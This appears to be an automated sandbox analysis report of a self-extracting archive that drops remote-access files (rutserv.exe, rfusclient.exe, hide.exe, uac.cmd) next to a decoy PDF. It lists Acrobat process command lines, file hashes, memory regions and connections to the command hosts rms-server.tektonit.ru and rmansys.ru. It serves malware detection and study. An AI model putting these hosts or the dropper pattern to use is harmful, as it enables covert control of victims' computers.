"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=82DB75B38B652101CA9E60EF04AA88E8 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=82DB75B38B652101CA9E60EF04AA88E8 --renderer-client-id=2 --mojo-platform-channel-handle=1704 --allow-no-sandbox-job /prefetch:1

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=E2ACCBD01E4F31BABE8879BCEC0D590E --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=E2ACCBD01E4F31BABE8879BCEC0D590E --renderer-client-id=4 --mojo-platform-channel-handle=2240 --allow-no-sandbox-job /prefetch:1

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=6A8F3B93ECB4008E5A24A38740E91A5C --mojo-platform-channel-handle=2516 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=A67D202DC01F7D70231FC22D095F377B --mojo-platform-channel-handle=1816 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=5C5E6CC1E4FA9CD3287AFF2917B356C7 --mojo-platform-channel-handle=2532 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

Network

Country Destination Domain Proto
US 52.109.8.19:443 tcp
US 8.8.8.8:53 rms-server.tektonit.ru udp
US 8.8.8.8:53 rmansys.ru udp
RU 95.213.205.83:5655 rms-server.tektonit.ru tcp
RU 31.31.198.18:80 rmansys.ru tcp
RU 31.31.198.18:80 rmansys.ru tcp
RU 95.213.205.83:5655 rms-server.tektonit.ru tcp

Files

C:\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe

MD5 824b1588338b6731e28ff94c621ced0b
SHA1 cd1bc431f53e9cff8204279cdf274838de8ebb61
SHA256 5f8d156ed1f17a23a49f29b2e7954c629d74c0e12b98c46ced0c9f28f35aa369
SHA512 b9a9cbf1171a1328fcabf013cdf33133f19ab61bc34fc892fb592de007179def90af4be095038880e0d5653c5cfe2a191cccb1e906cfe335937201970550161e

C:\Users\Admin\AppData\Local\Temp\RarSFX0\uac.cmd

MD5 36d09166ae9f88caa1b2d80a392ed1c8
SHA1 b248e43bab127d8e1e466821b96b7b7ecf37cb78
SHA256 3552631b96bf28d3e4641cc83684e5bd2cc00cc9aca31d456c688d16df674135
SHA512 d45e916cd913c6c1fbd59cd94c8ab55c158c9c616decaffccf0334ae4dd82b30301809c334322858c9b8b44d5d72bfe2ee2ee5b11a65a5ea9d945581e67a089b

C:\Users\Admin\AppData\Local\Temp\RarSFX0\data.dat

MD5 f1d16ce97d2fb39ad52e84bdc8d51d46
SHA1 c268cab6d8ec267eee463672809faaee99c2f446
SHA256 85417332dae0e7cf7ee44773d19e344c27bbf000d9165ca1e0c7a6d0f9e57a0f
SHA512 cff4f2475ed74e9102a2cfd88d019119f90d47086dcef3a2c053c0a7b0279076caf7782aeb314b857c304b52cd482badb4e6e1a611191a807317e92e60fe16e5

C:\Users\Admin\AppData\Local\Temp\RarSFX0\hide.dat

MD5 eb513889e806ce193274ea8858e89ab5
SHA1 3c1ff7bbe8bc2be9e5531ffad25b18f03c51cf6b
SHA256 f5609e3bcc1695839ae0d3a3ff08d5c73d0bab4afa3a2b5fced6c9b14f2aa993
SHA512 cb3d254c7ee4c918a320629e461b99acf90ef92d0276d2663f1b93ea17aa8612226c39c7c234283955fe9e071f7fa324f2586e7eba8ebc3fb5674f58af005e26

C:\Users\Admin\AppData\Local\Temp\RarSFX0\MIP1023.pdf

MD5 83f604f3087b84afc6846673054e861f
SHA1 88c3fda42768c5b465fd680591639f2cdc933283
SHA256 11e0a49bfe8173983e6ddf13052da345b3322f8d6d8cd2e89dd602d89941516e
SHA512 73ff11caf9b5415157c409d3bcef0b534146538c632f4850ab813cfdbb15ef5f057ad2a1bda591e9ec27ad16d7e8aa10e4b58bc603db53c859819f1a08c01f98

C:\Users\Admin\AppData\Local\Temp\RarSFX0\rfusclient.dat

MD5 a24ce4468618751732a5f3cd01e66a8b
SHA1 4d46fb773c02a9ff98e998da4f0777fb5d9f796b
SHA256 acf797494691e34077f9e6cda9a39f91a3efa0a840b71859ffde36bf3e228f2e
SHA512 4eb928491764b2960474e71229d8a3f219029f91ff3725218d58de83ae414c3f7b3bc421915b008aaf1393706a0c836615906bd6a6291af6370bb9f98ab58a3a

C:\Users\Admin\AppData\Local\Temp\RarSFX0\rutserv.dat

MD5 27a98c9a7fa7120147ae523efa9fadbf
SHA1 6a5ca3b9ee0a048f0aee1e99cbf3943d84f597ff
SHA256 53071088adb86f5d7a8c82573da94849edbd5f102bc94c9775247a54e26eaf57
SHA512 8f09b0211e6c4c6d5ddf9a797e59501bb0db4cb2d8d730f4c412a4b83adf68ad617516f330e1b0bcfecb07c514be56440e5b2ac3c55537495ce19ae64fcbf03c

C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe

MD5 824b1588338b6731e28ff94c621ced0b
SHA1 cd1bc431f53e9cff8204279cdf274838de8ebb61
SHA256 5f8d156ed1f17a23a49f29b2e7954c629d74c0e12b98c46ced0c9f28f35aa369
SHA512 b9a9cbf1171a1328fcabf013cdf33133f19ab61bc34fc892fb592de007179def90af4be095038880e0d5653c5cfe2a191cccb1e906cfe335937201970550161e

C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe

MD5 824b1588338b6731e28ff94c621ced0b
SHA1 cd1bc431f53e9cff8204279cdf274838de8ebb61
SHA256 5f8d156ed1f17a23a49f29b2e7954c629d74c0e12b98c46ced0c9f28f35aa369
SHA512 b9a9cbf1171a1328fcabf013cdf33133f19ab61bc34fc892fb592de007179def90af4be095038880e0d5653c5cfe2a191cccb1e906cfe335937201970550161e

C:\Users\Admin\AppData\Roaming\Microsoft\hide.dat

MD5 eb513889e806ce193274ea8858e89ab5
SHA1 3c1ff7bbe8bc2be9e5531ffad25b18f03c51cf6b
SHA256 f5609e3bcc1695839ae0d3a3ff08d5c73d0bab4afa3a2b5fced6c9b14f2aa993
SHA512 cb3d254c7ee4c918a320629e461b99acf90ef92d0276d2663f1b93ea17aa8612226c39c7c234283955fe9e071f7fa324f2586e7eba8ebc3fb5674f58af005e26

memory/1796-267-0x0000000000400000-0x00000000004D3000-memory.dmp

memory/1796-269-0x0000000000400000-0x00000000004D3000-memory.dmp

memory/1796-270-0x0000000000400000-0x00000000004D3000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.dat

MD5 27a98c9a7fa7120147ae523efa9fadbf
SHA1 6a5ca3b9ee0a048f0aee1e99cbf3943d84f597ff
SHA256 53071088adb86f5d7a8c82573da94849edbd5f102bc94c9775247a54e26eaf57
SHA512 8f09b0211e6c4c6d5ddf9a797e59501bb0db4cb2d8d730f4c412a4b83adf68ad617516f330e1b0bcfecb07c514be56440e5b2ac3c55537495ce19ae64fcbf03c

memory/3120-273-0x0000000000400000-0x0000000000AF8000-memory.dmp

memory/3120-275-0x0000000000400000-0x0000000000AF8000-memory.dmp

memory/3120-276-0x0000000000400000-0x0000000000AF8000-memory.dmp

memory/3120-277-0x0000000000400000-0x0000000000AF8000-memory.dmp

memory/3120-278-0x0000000000BE0000-0x0000000000D2A000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\rfusclient.exe

MD5 824b1588338b6731e28ff94c621ced0b
SHA1 cd1bc431f53e9cff8204279cdf274838de8ebb61
SHA256 5f8d156ed1f17a23a49f29b2e7954c629d74c0e12b98c46ced0c9f28f35aa369
SHA512 b9a9cbf1171a1328fcabf013cdf33133f19ab61bc34fc892fb592de007179def90af4be095038880e0d5653c5cfe2a191cccb1e906cfe335937201970550161e

memory/652-283-0x0000000000C50000-0x0000000000C51000-memory.dmp

memory/652-284-0x0000000000400000-0x0000000000AF8000-memory.dmp

memory/652-285-0x0000000000400000-0x0000000000AF8000-memory.dmp

memory/652-287-0x0000000000400000-0x0000000000AF8000-memory.dmp

memory/652-289-0x0000000000400000-0x0000000000AF8000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\rfusclient.dat

MD5 a24ce4468618751732a5f3cd01e66a8b
SHA1 4d46fb773c02a9ff98e998da4f0777fb5d9f796b
SHA256 acf797494691e34077f9e6cda9a39f91a3efa0a840b71859ffde36bf3e228f2e
SHA512 4eb928491764b2960474e71229d8a3f219029f91ff3725218d58de83ae414c3f7b3bc421915b008aaf1393706a0c836615906bd6a6291af6370bb9f98ab58a3a

memory/4004-292-0x0000000000400000-0x0000000000A98000-memory.dmp

memory/4004-294-0x0000000000400000-0x0000000000A98000-memory.dmp

memory/4004-295-0x0000000000BD0000-0x0000000000D1A000-memory.dmp

memory/3848-298-0x00000000771B2000-0x00000000771B3000-memory.dmp

memory/1464-301-0x00000000771B2000-0x00000000771B3000-memory.dmp

memory/3200-306-0x00000000771B2000-0x00000000771B3000-memory.dmp

memory/3028-311-0x00000000771B2000-0x00000000771B3000-memory.dmp

memory/1448-314-0x00000000771B2000-0x00000000771B3000-memory.dmp

memory/2308-317-0x00000000771B2000-0x00000000771B3000-memory.dmp

\??\PIPE\RManFUSCallbackNotify32

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e